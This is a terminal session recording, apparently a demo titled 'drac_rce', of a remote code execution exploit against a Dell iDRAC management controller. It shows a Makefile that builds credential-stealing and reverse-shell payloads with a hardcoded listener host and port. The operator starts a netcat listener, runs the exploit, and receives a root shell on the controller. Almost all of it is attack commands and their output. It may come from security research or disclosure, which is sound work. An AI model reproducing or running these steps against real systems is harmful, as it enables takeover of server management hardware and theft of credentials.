{"version": 2, "width": 115, "height": 58, "timestamp": 1623183869, "env": {"SHELL": "/bin/zsh", "TERM": "xterm-256color"}}
[0.006522, "o", "\u001b[?1049h\u001b[22;0;0t\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?1006l\u001b[?1005l\u001b[c\u001b[1337n\u001b(B\u001b[m\u001b[?12;25h\u001b[?12l\u001b[?25h\u001b[?1003l\u001b[?1006l\u001b[?2004l\u001b[1;1H\u001b[1;58r\u001b[1;10H\u001b[?2004h"]
[0.007519, "o", "\u001b]0;babbage\u0007\u001b[?25l\u001b[Hbabbage% \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[demo] 0:drac_rce*                                                                        \"babbage\" 15:24 08-Jun-21\u001b(B\u001b[m\u001b[1;10H\u001b[?12l\u001b[?25h\u001b[1;57r\u001b[2;57r\u001b[56S\u001b[1;1H\u001b[Kbabbage% "]
[0.007628, "o", "\u001b(B\u001b[m\u001b[?12;25h\u001b[?12l\u001b[?25h\u001b[?1003l\u001b[?1006l\u001b[?2004l\u001b[1;1H\u001b[1;58r\u001b[1;10H\u001b[?2004h"]
[0.008993, "o", "\u001b[?25l\u001b[Hbabbage% \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[demo] 0:drac_rce*                                                                        \"babbage\" 15:24 08-Jun-21\u001b(B\u001b[m\u001b[1;10H\u001b[?12l\u001b[?25h"]
[0.900806, "o", "c"]
[1.004366, "o", "\bca"]
[1.108523, "o", "t"]
[1.211803, "o", " "]
[1.314795, "o", "M"]
[1.417827, "o", "a"]
[1.520823, "o", "k"]
[1.623888, "o", "e"]
[1.726845, "o", "f"]
[1.829906, "o", "i"]
[1.934058, "o", "l"]
[2.038316, "o", "e"]
[2.142733, "o", "\r\n\u001b[?2004l"]
[2.148699, "o", "get_creds:\u001b[3;9Hsh4-linux-gnu-gcc -shared -fPIC ./get_creds.c -o ./payload.so\u001b[5;1Hget_shell:\u001b[6;9Hsh4-linux-gnu-gcc -DLHOST=\\\"10.87.1.10\\\" -DLPORT=4444 -shared -fPIC ./get_shell.c -o ./payload.so \r\n"]
[2.148984, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                                                  \u001b[7;1H \r\u001b[1;57r\u001b[8;57r\u001b[50S\u001b[7;1H\u001b[Kbabbage% \u001b[K\u001b[1;58r\u001b[7;10H\u001b[?2004h"]
[6.248728, "o", "m"]
[6.351913, "o", "\bma"]
[6.455155, "o", "k"]
[6.558298, "o", "e"]
[6.661658, "o", " "]
[6.765136, "o", "g"]
[6.869324, "o", "e"]
[6.972506, "o", "t"]
[7.076305, "o", "_"]
[7.179393, "o", "s"]
[7.283082, "o", "h"]
[7.387551, "o", "e"]
[7.491656, "o", "l"]
[7.594713, "o", "l"]
[7.698472, "o", "\r\n\u001b[?2004l"]
[7.700579, "o", "sh4-linux-gnu-gcc -DLHOST=\\\"10.87.1.10\\\" -DLPORT=4444 -shared -fPIC ./get_shell.c -o ./payload.so \r\n"]
[7.751314, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                                                  \u001b[9;1H \u001b[1;57r\u001b[10;57r\u001b[48S\u001b[9;1H\u001b[Kbabbage% \u001b[K\u001b[1;58r\u001b[9;10H\u001b[?2004h"]
[9.805446, "o", "\u001b[29;1H──────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────\u001b[?25l\u001b(B\u001b[m\u001b[1;1Hbabbage% cat Makefile\u001b[K\r\nget_creds:\u001b[K\u001b[3;8H\u001b[1K\u001b[Csh4-linux-gnu-gcc -shared -fPIC ./get_creds.c -o ./payload.so\u001b[K\r\n\u001b[K\r\nget_shell:\u001b[K\u001b[6;8H\u001b[1K\u001b[Csh4-linux-gnu-gcc -DLHOST=\\\"10.87.1.10\\\" -DLPORT=4444 -shared -fPIC ./get_shell.c -o ./payload.so \u001b[K\r\nbabbage% make get_shell\u001b[K\r\nsh4-linux-gnu-gcc -DLHOST=\\\"10.87.1.10\\\" -DLPORT=4444 -shared -fPIC ./get_shell.c -o ./payload.so \u001b[K\r\nbabbage% \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[2B\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[demo"]
[9.805739, "o", "] 0:drac_rce*                                                                        \"babbage\" 15:24 08-Jun-21\u001b(B\u001b[m\u001b[30;1H\u001b[?12l\u001b[?25h\u001b[?2004l\u001b[1;28r\u001b[10;28r\u001b[19S\u001b[9;1H\u001b[Kbabbage% \u001b[1;58r\u001b[30;1H"]
[9.807745, "o", "n"]
[9.810044, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                                                  \r \r"]
[9.810726, "o", "\u001b[30;57r\u001b[32;57r\u001b[26S\u001b[31;1H\u001b[Kbabbage% \u001b[K\u001b[1;58r\u001b[31;10H\u001b[?2004hn"]
[9.912551, "o", "\bnc"]
[10.017226, "o", " "]
[10.120277, "o", "-"]
[10.224482, "o", "v"]
[10.328974, "o", " "]
[10.433235, "o", "-"]
[10.537319, "o", "l"]
[10.641322, "o", " "]
[10.744918, "o", "-"]
[10.848583, "o", "p"]
[10.952109, "o", " "]
[11.055487, "o", "4"]
[11.159688, "o", "4"]
[11.263917, "o", "4"]
[11.368021, "o", "4"]
[11.471806, "o", "\r\n\u001b[?2004l"]
[13.576687, "o", "\u001b[9;10HL\u001b[32;1H"]
[13.68096, "o", "\u001b[9;10HLO\u001b[32;1H"]
[13.785063, "o", "\u001b[9;12HG\u001b[32;1H"]
[13.888706, "o", "\u001b[9;13HL\u001b[32;1H"]
[13.991738, "o", "\u001b[9;14HE\u001b[32;1H"]
[14.09517, "o", "\u001b[9;15HV\u001b[32;1H"]
[14.198571, "o", "\u001b[9;16HE\u001b[32;1H"]
[14.302041, "o", "\u001b[9;17HL\u001b[32;1H"]
[14.405599, "o", "\u001b[9;18H=\u001b[32;1H"]
[14.50896, "o", "\u001b[9;19HI\u001b[32;1H"]
[14.524942, "o", "Listening on [0.0.0.0] (family 2, port 4444)\r\n"]
[14.612021, "o", "\u001b[9;20HN\u001b[33;1H"]
[14.715265, "o", "\u001b[9;21HF\u001b[33;1H"]
[14.818709, "o", "\u001b[9;22HO\u001b[33;1H"]
[14.922192, "o", "\u001b[9;23H \u001b[33;1H"]
[15.025189, "o", "\u001b[9;24H.\u001b[33;1H"]
[15.128163, "o", "\u001b[9;25H/\u001b[33;1H"]
[15.231213, "o", "\u001b[9;26Hd\u001b[33;1H"]
[15.334201, "o", "\u001b[9;27Hr\u001b[33;1H"]
[15.438094, "o", "\u001b[9;28Ha\u001b[33;1H"]
[15.541459, "o", "\u001b[9;29Hc\u001b[33;1H"]
[15.645091, "o", "\u001b[9;30H_\u001b[33;1H"]
[15.749373, "o", "\u001b[9;31He\u001b[33;1H"]
[15.853871, "o", "\u001b[9;32Hx\u001b[33;1H"]
[15.956906, "o", "\u001b[9;33He\u001b[33;1H"]
[16.061137, "o", "\u001b[9;34Hc\u001b[33;1H"]
[16.288037, "o", "\u001b[10dUsage: ./drac_exec ip\u001b[33;1H"]
[16.297007, "o", "\u001b[11d\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                                                  \u001b[11;1H \u001b[33;1H\u001b[1;28r\u001b[12;28r\u001b[17S\u001b[11;1H\u001b[Kbabbage% \u001b[K\u001b[1;58r\u001b[33;1H"]
[17.270272, "o", "i"]
[17.373641, "o", "d"]
[17.477541, "o", "\r\n"]
[17.692272, "o", "Connection from 10.87.5.42 47913 received!\r\n"]
[17.74257, "o", "uid=0(root) gid=0(root)\r\n"]
[18.58207, "o", "u"]
[18.685613, "o", "n"]
[18.790105, "o", "a"]
[18.89423, "o", "m"]
[18.997482, "o", "e"]
[19.101505, "o", " "]
[19.205597, "o", "-"]
[19.310085, "o", "a"]
[19.414453, "o", "\r\n"]
[19.454376, "o", "Linux idrac-G582DZ1 3.4.11 #1 Thu Aug 18 13:03:21 CDT 2016 sh4a GNU/Linux\r\n"]
[20.520617, "o", "c"]
[20.623724, "o", "a"]
[20.727762, "o", "t"]
[20.831718, "o", " "]
[20.935116, "o", "/"]
[21.038499, "o", "p"]
[21.141912, "o", "r"]
[21.245729, "o", "o"]
[21.34996, "o", "c"]
[21.45358, "o", "/"]
[21.557852, "o", "v"]
[21.662216, "o", "e"]
[21.765425, "o", "r"]
[21.868376, "o", "s"]
[21.971408, "o", "i"]
[22.075423, "o", "o"]
[22.178437, "o", "n"]
[22.282647, "o", "\r\n"]
[22.319141, "o", "Linux version 3.4.11 (jenkins@gitbuild12g105) (gcc version 4.7.2 (GCC) ) #1 Thu Aug 18 13:03:21 CDT 2016\r\n"]
